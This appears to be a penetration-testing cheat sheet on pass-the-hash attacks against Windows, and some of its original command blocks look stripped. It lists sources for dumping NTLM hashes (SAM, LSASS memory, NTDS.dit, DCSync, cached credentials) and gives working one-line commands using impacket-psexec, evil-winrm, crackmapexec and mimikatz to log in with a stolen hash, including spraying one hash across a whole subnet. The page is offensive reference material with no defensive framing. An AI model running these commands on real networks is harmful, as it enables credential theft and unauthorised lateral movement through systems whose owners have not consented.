Overview
Use NTLM hash directly for authentication. No need to crack. Works with SMB, WinRM, RDP (restricted admin), WMI, etc.Impacket
CrackMapExec
Evil-WinRM
xfreerdp (RDP — Restricted Admin)
Mimikatz (Windows)
Spray Hash Across Subnet
Get the Hash
| Source | Tool |
|---|---|
| SAM database | secretsdump, reg save |
| LSASS memory | mimikatz, procdump |
| NTDS.dit | secretsdump, ntdsutil |
| DCSync | secretsdump -just-dc |
| Cached creds | mimikatz lsadump::cache |
Quick Reference
| Task | Command |
|---|---|
| PsExec | impacket-psexec DOM/user@TARGET -hashes :HASH |
| WinRM | evil-winrm -i TARGET -u user -H HASH |
| CME | crackmapexec smb TARGET -u user -H HASH |
| Mimikatz | sekurlsa::pth /user:admin /ntlm:HASH |
| Spray | crackmapexec smb SUBNET -u admin -H HASH |